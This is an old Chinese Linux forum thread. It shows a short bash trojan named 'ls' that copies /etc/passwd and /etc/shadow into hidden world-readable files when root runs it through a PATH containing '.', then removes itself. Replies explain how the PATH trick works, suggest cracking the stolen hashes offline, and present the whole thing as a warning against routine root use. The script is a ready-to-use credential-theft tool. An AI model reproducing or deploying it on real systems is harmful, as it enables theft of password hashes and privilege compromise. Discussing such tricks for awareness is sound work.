窃取你的密码文件的小脚本

kiron · 发表于 2003-12-16 20:19:47

可能是比较老的伎俩了吧？

#!/bin/bash
cp /etc/passwd ./.passwd_hide>/dev/null 2>&1
chmod 777 .passwd_hide>/dev/null 2>&1
cp /etc/shadow ./.shadow_hide>/dev/null 2>&1
chmod 777 .passwd_hide>/dev/null 2>&1
/bin/ls
rm -f ls >/dev/null 2>&1

复制代码

若有恶意的用户把上述源码保存在用户目录下命名为ls
再把命令搜索路径中.目录放在/bin目录前，有超级用户权限的用户进入用户目录使用ls命令立马中招，密码文件就被窃取了！而且，一般来说，这个机会是很大的，只要你进入某个目录，嘿嘿，回想一下一般你第一个命令用的是什么？出冷汗了吗？

所以不要什么都用root操作的原因就是这了，步步危机啊~！！

lingxz · 发表于 2003-12-17 09:04:46

获得这2个文件怎么回去密码？

cx6445 · 发表于 2003-12-17 09:38:44

你能改ls命令还没root密码？

fishfeather · 发表于 2003-12-17 12:39:26

passwd和shadow文件都经过加密
你拿到也没什么用啊
另外问一下
>&
这个符号有什么作用
找了些资料都没找到

kiron · 发表于 2003-12-17 13:35:50

最初由 lingxz 发表
获得这2个文件怎么回去密码？

破密码

你能改ls命令还没root密码？

不明白你说什么？:ask :ask :ask

passwd和shadow文件都经过加密
你拿到也没什么用啊
另外问一下
>&
这个符号有什么作用
找了些资料都没找到

你肯定没用过搜索
下面是我用搜索搜出来的
http://www.linuxsir.cn/bbs/showt ... =%D6%D8%B6%A8%CF%F2

shenhaiyu · 发表于 2003-12-17 21:04:59

这么说，你是修改了ls。可是这个ls文件放在那里。我说的是在那里能找到那个ls.c文件。

fishfeather · 发表于 2003-12-17 21:12:36

555555555
冤枉啊
我搜索了
但是系统提示关键字字数太少。。。。叫我如何是好？

KornLee · 发表于 2003-12-17 21:23:16

最初由 fishfeather 发表
555555555
冤枉啊
我搜索了
但是系统提示关键字字数太少。。。。叫我如何是好？

多看看精华区,相信里面有你想知道的:>&
所谓盗窃别人密码的脚本,咱们脚本区也有一个,不过也是2OLD ;)
http://www.linuxsir.cn/bbs/showthread.php?threadid=29701

kiron · 发表于 2003-12-17 22:44:55

最初由 shenhaiyu 发表
这么说，你是修改了ls。可是这个ls文件放在那里。我说的是在那里能找到那个ls.c文件。

不是修改ls文件，只是把这个脚本名命名为ls，从而诱使root用户进入存放这个脚本的目录时使用ls命令执行的却是ls脚本，一般来说，命令的搜索路径在PATH变量中排前的目录先搜索，若是root用户的PATH目录中.目录在/bin/目录前的话，进入存放这个脚本的目录时打入ls命令执行的是ls脚本，而非/bin/ls命令，而ls命令一般是一进入目录就执行的目录，成功率比较高，得到密码文件后就可以慢慢用解密程序慢慢解，这样是很危险的。

上述就是这个脚本的原理了，综合了人的心理，习惯，技巧，技术原理，值得了解一下

devel · 发表于 2003-12-17 22:48:45

最初由 kiron 发表
不是修改ls文件，只是把这个脚本名命名为ls，从而诱使root用户进入存放这个脚本的目录时使用ls命令执行的却是ls脚本，一般来说，命令的搜索路径在PATH变量中排前的目录先搜索，若是root用户的PATH目录中.目录在/bin/目录前的话，进入存放这个脚本的目录时打入ls命令执行的是ls脚本，而非/bin/ls命令，而ls命令一般是一进入目录就执行的目录，成功率比较高，得到密码文件后就可以慢慢用解密程序慢慢解，这样是很危险的。

上述就是这个脚本的原理了，综合了人的心理，习惯，技巧，技术原理，值得了解一下

怎么解:ask:ask

		自动登录	找回密码
密码			注册